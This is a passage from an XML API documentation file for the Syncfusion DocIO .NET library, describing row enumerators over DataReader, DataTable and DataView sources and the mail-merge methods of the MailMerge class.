            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.Rendering.WordToPDFResult"/> class.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Rendering.WordToPDFResult.Pages">
            <summary>
            Gets the pages.
            </summary>
            <value>The pages.</value>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Rendering.PageResult.#ctor">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.Rendering.PageResult"/> class.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Rendering.PageResult.PageImage">
            <summary>
            Gets or sets the rendered image.
            </summary>
            <value>The rendered image.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Rendering.PageResult.Hyperlinks">
            <summary>
            Gets or sets the hyperlinks.
            </summary>
            <value>The hyperlinks.</value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.DataReaderEnumerator">
            <summary>
            Summary description for DataReaderEnumerator.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.IRowsEnumerator">
            <summary>
            Represents the Rows Enumerator.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IRowsEnumerator.Reset">
            <summary>
            Resets the row index.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IRowsEnumerator.NextRow">
            <summary>
            Returns a value indicating whether the end of row is reached. 
            </summary>
            <returns><b>True</b> if it is end of row, otherwise <b>false</b></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IRowsEnumerator.GetCellValue(System.String)">
            <summary>
            Returns the cell value for a specified column name.
            </summary>
            <param name="columnName">The <b>string</b> represents the column name.</param>
            <returns>The element at the specified cell.</returns>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IRowsEnumerator.ColumnNames">
            <summary>
            Gets the column names of the table.
            </summary>
            <value>The string array that has the column names of the table.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IRowsEnumerator.RowsCount">
            <summary>
            Gets the total rows count.
            </summary>
            <value>The <b>integer</b> that represents the total number of rows.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IRowsEnumerator.CurrentRowIndex">
            <summary>
            Gets the current row index.
            </summary>
            <value>The <b>integer</b> that represents the index of the current row.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IRowsEnumerator.TableName">
            <summary>
            Gets the table name.
            </summary>
            <value>The <b>string</b> that represents the name of the table.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IRowsEnumerator.IsEnd">
            <summary>
            Gets a value indicating whether the end of the row is reached.
            </summary>
            <value><b>True</b> if it is the end of the row, otherwise <b>false</b>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IRowsEnumerator.IsLast">
            <summary>
            Gets a value indicating whether the current row is last row.
            </summary>
            <value><b>True</b> if its last row, otherwise, <b>false</b>.</value>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DataReaderEnumerator.#ctor(System.Data.IDataReader)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.DataReaderEnumerator"/> class.
            </summary>
            <param name="dataReader">The data reader.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DataReaderEnumerator.Reset">
            <summary>
            Resets the row index.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DataReaderEnumerator.NextRow">
            <summary>
            Returns a Boolean indicating whether the end of row is reached. 
            </summary>
            <returns><b>True</b> if it is end of row, otherwise <b>false</b></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DataReaderEnumerator.GetCellValue(System.String)">
            <summary>
            Returns the cell value for a specified column name.
            </summary>
            <param name="columnName">The <b>string</b> represents the column name.</param>
            <returns>The element at the specified cell.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DataReaderEnumerator.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DataReaderEnumerator.CurrentRowIndex">
            <summary>
            Gets the current row index.
            </summary>
            <value>The <b>integer</b> that represents the index of the current row.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DataReaderEnumerator.RowsCount">
            <summary>
            Gets the total rows count.
            </summary>
            <value>The <b>integer</b> that represents the total number of rows.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DataReaderEnumerator.TableName">
            <summary>
            Gets the table name.
            </summary>
            <value>The <b>string</b> that represents the name of the table.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DataReaderEnumerator.IsEnd">
            <summary>
            Gets a value indicating whether the end of the row is reached.
            </summary>
            <value><b>True</b> if it is the end of the row, otherwise <b>false</b>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DataReaderEnumerator.IsLast">
            <summary>
            Gets a value indicating whether the current row is last row.
            </summary>
            <value><b>True</b> if its last row, otherwise, <b>false</b>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DataReaderEnumerator.CurrentRow">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DataReaderEnumerator.ColumnNames">
            <summary>
            Gets the column names of the table.
            </summary>
            <value>The string array that has the column names of the table.</value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.DataTableEnumerator">
            <summary>
            Summary description for DataTableEnumerator.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.DataTableEnumerator.m_table">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.DataTableEnumerator.m_row">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.DataTableEnumerator.m_currRowIndex">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.DataTableEnumerator.m_columnsNames">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DataTableEnumerator.#ctor(System.Data.DataTable)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.DataTableEnumerator"/> class.
            </summary>
            <param name="table">The table.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DataTableEnumerator.#ctor(System.Data.DataRow)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.DataTableEnumerator"/> class.
            </summary>
            <param name="row">The row.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DataTableEnumerator.Reset">
            <summary>
            Resets the row index.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DataTableEnumerator.NextRow">
            <summary>
            Returns a Boolean indicating whether the end of row is reached. 
            </summary>
            <returns><b>True</b> if it is end of row, otherwise <b>false</b></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DataTableEnumerator.GetCellValue(System.String)">
            <summary>
            Returns the cell value for a specified column name.
            </summary>
            <param name="columnName">The <b>string</b> represents the column name.</param>
            <returns>The element at the specified cell.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DataTableEnumerator.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DataTableEnumerator.ReadColumnNames(System.Data.DataTable)">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.DataTableEnumerator.m_tableName">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.DataTableEnumerator.m_MMtable">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.DataTableEnumerator.m_userClassType">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.DataTableEnumerator.m_rowCount">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DataTableEnumerator.#ctor(Syncfusion.DocIO.DLS.MailMergeDataTable)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.DataTableEnumerator"/> class.
            </summary>
            <param name="table">The table.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DataTableEnumerator.ReadColumnNames(Syncfusion.DocIO.DLS.MailMergeDataTable)">
            <summary>
            Read the column names from mail merge data table of type IDictionary&lt;string,object&gt; ie collection of ExpandoObject
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DataTableEnumerator.ReadColumnNames(System.Collections.IEnumerator)">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DataTableEnumerator.CalculRowCount">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DataTableEnumerator.CurrentRowIndex">
            <summary>
            Gets the current row index.
            </summary>
            <value>The <b>integer</b> that represents the index of the current row.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DataTableEnumerator.RowsCount">
            <summary>
            Gets the total rows count.
            </summary>
            <value>The <b>integer</b> that represents the total number of rows.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DataTableEnumerator.TableName">
            <summary>
            Gets the table name.
            </summary>
            <value>The <b>string</b> that represents the name of the table.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DataTableEnumerator.IsEnd">
            <summary>
            Gets a value indicating whether the end of the row is reached.
            </summary>
            <value><b>True</b> if it is the end of the row, otherwise <b>false</b>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DataTableEnumerator.IsLast">
            <summary>
            Gets a value indicating whether the current row is last row.
            </summary>
            <value><b>True</b> if its last row, otherwise, <b>false</b>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DataTableEnumerator.CurrentRow">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DataTableEnumerator.ColumnNames">
            <summary>
            Gets the column names of the table.
            </summary>
            <value>The string array that has the column names of the table.</value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.DataViewEnumerator">
            <summary>
            Summary description for DataViewEnumerator.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.DataViewEnumerator.m_dataView">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.DataViewEnumerator.m_table">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.DataViewEnumerator.m_row">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.DataViewEnumerator.m_currRowIndex">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.DataViewEnumerator.m_columnNames">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DataViewEnumerator.#ctor(System.Data.DataView)">
            <summary>
            
            </summary>
            <param name="dataView"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DataViewEnumerator.Reset">
            <summary>
            Resets the row index.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DataViewEnumerator.NextRow">
            <summary>
            Returns a Boolean indicating whether the end of row is reached. 
            </summary>
            <returns><b>True</b> if it is end of row, otherwise <b>false</b></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DataViewEnumerator.GetCellValue(System.String)">
            <summary>
            Returns the cell value for a specified column name.
            </summary>
            <param name="columnName">The <b>string</b> represents the column name.</param>
            <returns>The element at the specified cell.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DataViewEnumerator.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DataViewEnumerator.ReadColumnNames(System.Data.DataTable)">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DataViewEnumerator.CurrentRowIndex">
            <summary>
            Gets the current row index.
            </summary>
            <value>The <b>integer</b> that represents the index of the current row.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DataViewEnumerator.RowsCount">
            <summary>
            Gets the total rows count.
            </summary>
            <value>The <b>integer</b> that represents the total number of rows.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DataViewEnumerator.TableName">
            <summary>
            Gets the table name.
            </summary>
            <value>The <b>string</b> that represents the name of the table.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DataViewEnumerator.IsEnd">
            <summary>
            Gets a value indicating whether the end of the row is reached.
            </summary>
            <value><b>True</b> if it is the end of the row, otherwise <b>false</b>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DataViewEnumerator.IsLast">
            <summary>
            Gets a value indicating whether the current row is last row.
            </summary>
            <value><b>True</b> if its last row, otherwise, <b>false</b>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DataViewEnumerator.CurrentRow">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DataViewEnumerator.ColumnNames">
            <summary>
            Gets the column names of the table.
            </summary>
            <value>The string array that has the column names of the table.</value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.MailMerge">
            <summary>
            Represents the mail merge functionality in the Word document. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.MailMerge.m_nestedEnums">
            <summary>
            Fields used for nested mail merge.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.#ctor(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.MailMerge"/> class.
            </summary>
            <param name="document">The document.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.Execute(System.String[],System.String[])">
            <summary>
            Performs the mail merge operation using an array of field names with its values as data source.
            </summary>
            <param name="fieldNames">The array of merge field names.</param>
            <param name="fieldValues">The array of merge field values.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.Execute(System.Collections.IEnumerable)">
            <summary>
            Performs the mail merge operation using a IEnumerable as data source.
            </summary>
            <param name="dataSource">IEnumerable data source that contains the mail merge field names with corresponding values.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.ExecuteGroup(Syncfusion.DocIO.DLS.MailMergeDataTable)">
            <summary>
            Performs the mail merge operation for a specified region.
            </summary>
            <param name="datatable">The <c>MailMergeDataTable</c> contains the  data source for performing mail merge operation.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.Execute(System.Data.DataRow)">
            <summary>
            Performs the mail merge operation using a DataRow as data source.
            </summary>
            <param name="row">The <c>DataRow</c> contains the data for performing mail merge operation.</param>
            <remarks>This method is not supported in Silverlight, WinRT, Windows Phone, Universal, Universal Windows Platform, MVC6 and Xamarin platforms.</remarks>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.Execute(System.Data.DataTable)">
            <summary>
            Performs the mail merge operation using a DataTable as data source.
            </summary>
            <param name="table">The <c>DataTable</c> contains the data for performing mail merge operation.</param>
            <remarks>This method is not supported in Silverlight, WinRT, Windows Phone, Universal, Universal Windows Platform, MVC6 and Xamarin platforms.</remarks>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.Execute(System.Data.DataView)">
            <summary>
             Performs the mail merge operation using a DataView as data source.
            </summary>
            <param name="dataView">The <c>DataView</c> contains the data for performing mail merge operation.</param>
            <remarks>This method is not supported in Silverlight, WinRT, Windows Phone, Universal, Universal Windows Platform, MVC6 and Xamarin platforms.</remarks>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.Execute(System.Data.OleDb.OleDbDataReader)">
            <summary>
            Performs the mail merge operation using a OleDbDataReader as data source.
            </summary>
            <param name="dataReader">The <c>OleDbDataReader</c> contains the data for performing mail merge operation.</param>
            <remarks>This method is not supported in Silverlight, WinRT, Windows Phone, Universal, Universal Windows Platform, MVC6 and Xamarin platforms.</remarks>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.Execute(System.Data.IDataReader)">
            <summary>
            Performs the mail merge operation using a IDataReader as data source.
            </summary>
            <param name="dataReader">The <c>IDataReader</c> contains the data for performing mail merge operation.</param>
            <remarks>This method is not supported in Silverlight, WinRT, Windows Phone, Universal, Universal Windows Platform, MVC6 and Xamarin platforms.</remarks>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.ExecuteGroup(System.Data.DataTable)">
            <summary>
            Performs the mail merge operation for a specified region using DataTable as data source.
            </summary>
            <param name="dataReader">The <c>DataTable</c> contains the data for performing mail merge operation.</param>
            <remarks>
            <para>ExecuteGroup mail merge functionality performs the replacements of merge fields, in which field names match the table column names with the ///corresponding values of table cell. These replacements are performed for every row contained in the table of the specified region.</para>
            <para>The region where the mail merge operations are to be performed must be marked by two MergeFields with the following names:</para>
            <list type="bullet">
            	<item><b>TableStart:TableName</b>: For the entry point of the region.</item>
            	<item><b>TableEnd:TableName</b>: For the end point of the region.</item>
            </list>
            <para>For Example, You have to insert three MergeFields in the document with the following field names:</para>
            <list type="bullet">
            	<item><b>TableStart:Geography</b>: Marks the beginning of mail merge region.</item>
            	<item><b>FieldNames</b>: Will be replaced by values from the table.</item>
            <item><b>TableEnd:Geography</b>: Marks the end of mail merge region.</item>
            </list>
            <para>This method is not supported in Silverlight, WinRT, Windows Phone, Universal, Universal Windows Platform, MVC6 and Xamarin platforms.</para>
            </remarks>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.ExecuteGroup(System.Data.DataView)">
            <summary>
            Performs the mail merge operation for a specified region using DataView as data source.
            </summary>
            <param name="dataReader">The <c>DataView</c> contains the data for performing mail merge operation.</param>
            <remarks>
            <para>ExecuteGroup mail merge functionality performs the replacements of merge fields, in which field names match the table column names with the ///corresponding values of table cell. These replacements are performed for every row contained in the table of the specified region.</para>
            <para>The region where the mail merge operations are to be performed must be marked by two MergeFields with the following names:</para>
            <list type="bullet">
            	<item><b>TableStart:TableName</b>: For the entry point of the region.</item>
            	<item><b>TableEnd:TableName</b>: For the end point of the region.</item>
            </list>
            <para>For Example, You have to insert three MergeFields in the document with the following field names:</para>
            <list type="bullet">
            	<item><b>TableStart:Geography</b>: Marks the beginning of mail merge region.</item>
            	<item><b>FieldNames</b>: Will be replaced by values from the table.</item>
            <item><b>TableEnd:Geography</b>: Marks the end of mail merge region.</item>
            </list>
            <para>This method is not supported in Silverlight, WinRT, Windows Phone, Universal, Universal Windows Platform, MVC6 and Xamarin platforms.</para>
            </remarks>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.ExecuteGroup(System.Data.IDataReader)">
            <summary>
            Performs the mail merge operation for a specified region using IDataReader as data source.
            </summary>
            <param name="dataReader">The <c>IDataReader</c> contains the data for performing mail merge operation.</param>
            <remarks>
            <para>ExecuteGroup mail merge functionality performs the replacements of merge fields, in which field names match the table column names with the ///corresponding values of table cell. These replacements are performed for every row contained in the table of the specified region.</para>
            <para>The region where the mail merge operations are to be performed must be marked by two MergeFields with the following names:</para>
            <list type="bullet">
            	<item><b>TableStart:TableName</b>: For the entry point of the region.</item>
            	<item><b>TableEnd:TableName</b>: For the end point of the region.</item>
            </list>
            <para>For Example, You have to insert three MergeFields in the document with the following field names:</para>
            <list type="bullet">
            	<item><b>TableStart:Geography</b>: Marks the beginning of mail merge region.</item>
            	<item><b>FieldNames</b>: Will be replaced by values from the table.</item>
            <item><b>TableEnd:Geography</b>: Marks the end of mail merge region.</item>
            </list>
            <para>This method is not supported in Silverlight, WinRT, Windows Phone, Universal, Universal Windows Platform, MVC6 and Xamarin platforms.</para>
            </remarks>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.ExecuteNestedGroup(System.Data.Common.DbConnection,System.Collections.ArrayList)">
            <summary>
            Performs the nested mail merge operation for a specified region using DataBase as data source.
            </summary>
            <param name="conn">The <b>DbConnection</b> represents the database connection which contains data for mail merge.</param>
            <param name="commands">The array of commands contains the sql queries to get the data from DB.</param>
            <remarks>
            <para>Nested mail merge for a region works when the group start and end is BeginGroup and EndGroup respectively.</para>
            <para>Nested mail merge for a table works when the group start and end is TableStart and TableEnd respectively.</para>
            <para>The commands list to retrieve the DataTable from the data source must be in the same order of Group which is preserved in the input WordDocument.</para>
            <para>This method is not supported in Silverlight, WinRT, Windows Phone, Universal, Universal Windows Platform, MVC6 and Xamarin platforms.</para>
            </remarks>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.ExecuteNestedGroup(System.Data.Common.DbConnection,System.Collections.ArrayList,System.Boolean)">
            <summary>
            Performs the nested mail merge operation for a specified region using DataBase as data source.
            </summary>
            <param name="conn">The <b>DbConnection</b> represents the database connection which contains data for mail merge.</param>
            <param name="commands">The array of commands contains the sql queries to get the data from DB.</param>
            <param name="isSqlConnection">Set to <b>true</b> to indicate the <paramref name="conn"/> is a SQLConnection; otherwise, <b>false</b>.</param>
            <remarks>
            <para>Nested mail merge for a region works when the group start and end is BeginGroup and EndGroup respectively.</para>
            <para>Nested mail merge for a table works when the group start and end is TableStart and TableEnd respectively.</para>
            <para>The commands list to retrieve the DataTable from the data source must be in the same order of Group which is preserved in the input WordDocument.</para>
            <para>This method is not supported in Silverlight, WinRT, Windows Phone, Universal, Universal Windows Platform, MVC6 and Xamarin platforms.</para>
            </remarks>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.ExecuteNestedGroup(System.Data.DataSet,System.Collections.ArrayList)">
            <summary>
            Performs the nested mail merge operation for a specified region using DataSet as data source.
            </summary>
            <param name="dataSet">The <b>DataSet</b> contains data for mail merge.</param>
            <param name="commands">The array of commands contains the queries to get the data from dataset.</param>
            <remarks>
            <para>Nested mail merge for a region works when the group start and end is BeginGroup and EndGroup respectively.</para>
            <para>Nested mail merge for a table works when the group start and end is TableStart and TableEnd respectively.</para>
            <para>The commands list to retrieve the DataTable from the data source must be in the same order of Group which is preserved in the input WordDocument.</para>
            <para>This method is not supported in Silverlight, WinRT, Windows Phone, Universal, Universal Windows Platform, MVC6 and Xamarin platforms.</para>
            </remarks>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.ExecuteNestedGroup(Syncfusion.DocIO.DLS.MailMergeDataTable)">
            <summary>
            Performs the nested mail merge operation for a specified region using the MailMergeDataTable as data source.
            </summary>
            <param name="dataTable">The <c>MailMergeDataTable</c> contains the  data source for performing mail merge operation.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.ExecuteNestedGroup(Syncfusion.DocIO.DLS.MailMergeDataSet,System.Collections.Generic.List{System.Collections.DictionaryEntry})">
            <summary>
            Performs the nested mail merge operation for a specified region using the MailMergeDataSet as data source.
            </summary>
            <param name="dataSource">The <c>MailMergeDataSet</c> contains the  data source for performing mail merge operation.</param>
            <param name="commands">Commands list</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.GetMergeFieldNames">
            <summary>
            Returns a collection of merge field names found in the document.
            </summary>
            <returns>The string array which contains the name of all the merge fields name in the document.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.GetMergeFieldNames(System.String)">
            <summary>
            Gets a collections of merge field names in the specified group.
            </summary>
            <param name="groupName">A String that represents the name of the group.</param>
            <returns>The string array which contains the name of all the merge fields name in the specified group.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.GetMergeGroupNames">
            <summary>
            Gets a collections of the merge field group names in the document.
            </summary>
            <returns>The string array which contains the name of all the merge fields group names in the document.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.GetMergeFieldNamesImpl(System.Collections.Generic.List{System.String},System.String)">
            <summary>
            Gets the merge field names.
            </summary>
            <param name="fieldsArray">The fields array.</param>
            <param name="groupName">Name of the group.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.OnGroupFound(Syncfusion.DocIO.DLS.IRowsEnumerator)">
            <summary>
            Called when group found by GroupSelector.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.CheckRecordsCount(Syncfusion.DocIO.DLS.IRowsEnumerator)">
            <summary>
            Check the count of the matching records
            </summary>
            <param name="rowsEnum">Rows </param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.EmptyGroup(Syncfusion.DocIO.DLS.MailMerge.GroupSelector)">
            <summary>
            Remove items between Empty Group
            </summary>
            <param name="gs">The group selector</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.EmptyGroupInTextbody(Syncfusion.DocIO.DLS.MailMerge.GroupSelector)">
            <summary>
            Remove items between Empty group present in Text body.
            </summary>
            <param name="gs">The group selector</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.EmptyGroupInTable(Syncfusion.DocIO.DLS.MailMerge.GroupSelector)">
            <summary>
            Removes items present between empty group present in Table.
            </summary>
            <param name="gs">The group selector</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.RemoveGoBackBookmark(Syncfusion.DocIO.DLS.MailMerge.GroupSelector)">
            <summary>
            Removes GoBack bookmark from selected group
            </summary>
            <param name="gs"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.RemoveItemsAfterTableStart(Syncfusion.DocIO.DLS.MailMerge.GroupSelector,Syncfusion.DocIO.DLS.WTable,System.Int32,System.Int32,System.Int32,System.Int32@,System.Int32,System.Int32@)">
            <summary>
            Removes items present in Group after Table Start field
            </summary>
            <param name="gs">The group selector</param>
            <param name="table">Table</param>
            <param name="startIndex">Start index</param>
            <param name="startParaIndex">Start para index</param>
            <param name="startCellIndex">Start cell index</param>
            <param name="endCellIndex">End cell index</param>
            <param name="startRowIndex">Start row index</param>
            <param name="endRowIndex">End row index</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.RemoveItemsAtTableEnd(Syncfusion.DocIO.DLS.MailMerge.GroupSelector,Syncfusion.DocIO.DLS.WTable,System.Int32,System.Int32,System.Int32,System.Int32,System.Int32,System.Int32)">
            <summary>
            Removes Items present in group at table end
            </summary>
            <param name="gs">The group selector</param>
            <param name="table">Table</param>
            <param name="endIndex">End index</param>
            <param name="endParaIndex">End para index</param>
            <param name="startCellIndex">Start cell index</param>
            <param name="endCellIndex">End cell index</param>
            <param name="startRowIndex">Start row index</param>
            <param name="endRowIndex">End row index</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.EmptyGroupInTableCell(Syncfusion.DocIO.DLS.MailMerge.GroupSelector)">
            <summary>
            Remove items between empty group present in table cell.
            </summary>
            <param name="gs">The group selector</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.RemoveItems(Syncfusion.DocIO.DLS.Entity,System.Int32,System.Int32)">
            <summary>
            Removes items from start index to end index.
            </summary>
            <param name="ent">Entity</param>
            <param name="startIndex">Start index</param>
            <param name="endIndex">End index</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.OnBodyGroupFound(Syncfusion.DocIO.DLS.IRowsEnumerator)">
            <summary>
            Called when body group found.
            </summary>
            <param name="rowsEnum">The rows enum.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.RemoveBookMarks(Syncfusion.DocIO.DLS.TextBodyPart)">
            <summary>
            Removes the bookmark from the TextbodyPart
            </summary>
            <param name="txtBodyPart"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.DeleteBoookmarks(Syncfusion.DocIO.DLS.IEntity)">
            <summary>
            Delete bookmarks
            </summary>
            <param name="entity"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.OnRowGroupFound(Syncfusion.DocIO.DLS.IRowsEnumerator)">
            <summary>
            Called when row group found.
            </summary>
            <param name="rowsEnum">The rows enum.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.ExecuteGroup(Syncfusion.DocIO.DLS.IRowsEnumerator)">
            <summary>
            
            </summary>
            <param name="rowsEnum"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.ExecuteGroup(Syncfusion.DocIO.DLS.WSection,Syncfusion.DocIO.DLS.IRowsEnumerator)">
            <summary>
            
            </summary>
            <param name="section"></param>
            <param name="rowsEnum"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.ExecuteGroupForSelection(Syncfusion.DocIO.DLS.WTextBody,System.Int32,System.Int32,System.Int32,System.Int32,Syncfusion.DocIO.DLS.IRowsEnumerator)">
            <summary>
            Executes the group for selection.
            </summary>
            <param name="textBody">The text body.</param>
            <param name="itemStart">The item start.</param>
            <param name="itemEnd">The item end.</param>
            <param name="pItemStart">The p item start.</param>
            <param name="pItemEnd">The p item end.</param>
            <param name="rowsEnum">The rows enum.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.GetTableEntity(Syncfusion.DocIO.DLS.Entity)">
            <summary>
            Get Table object if the given entity is available within the table
            </summary>
            <param name="entity"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.ExecuteGroupForRowSelection(Syncfusion.DocIO.DLS.WTable,System.Int32,System.Int32,Syncfusion.DocIO.DLS.IRowsEnumerator)">
            <summary>
            Executes the group for row selection.
            </summary>
            <param name="table">The table.</param>
            <param name="startRowIndex">Start index of the row.</param>
            <param name="count">The count.</param>
            <param name="rowsEnum">The rows enum.</param>
            <returns>The number of rows that took part in mail merge</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.ExecuteNestedGroup(System.String)">
            <summary>
            Executes the nested group.
            </summary>
            <param name="tableName">Name of the table.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.MailMerge.GetEnum(System.String)">
            <summary>
            Gets the enumerator for nested mail merge.
            </summary>
            <param name="tableName">Name of the table.</param>
            <returns></returns>
        </member>
